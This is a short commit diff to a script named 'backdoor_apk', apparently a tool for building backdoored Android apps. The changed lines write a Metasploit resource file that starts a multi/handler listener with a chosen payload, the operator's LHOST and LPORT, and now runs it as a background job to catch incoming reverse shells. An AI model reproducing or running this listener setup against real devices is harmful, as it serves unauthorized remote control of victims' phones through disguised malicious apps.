Update backdoor_apk

This commit is contained in:
peterpt 2017-03-20 09:21:23 -04:00 committed by GitHub
parent 114921d3d4
commit 9d0506c081
1 changed files with 1 additions and 2 deletions

View File

@ -601,6 +601,5 @@ echo "use exploit/multi/handler" > $svf
echo "set PAYLOAD $payloads" >> $svf
echo "set LHOST $yourip" >> $svf
echo "set LPORT $yourport" >> $svf
echo "exploit" >> $svf
echo "exit -y" >> $svf
echo "exploit -j" >> $svf
echo -e okegreen "Configuration file saved to $list/$save.rc"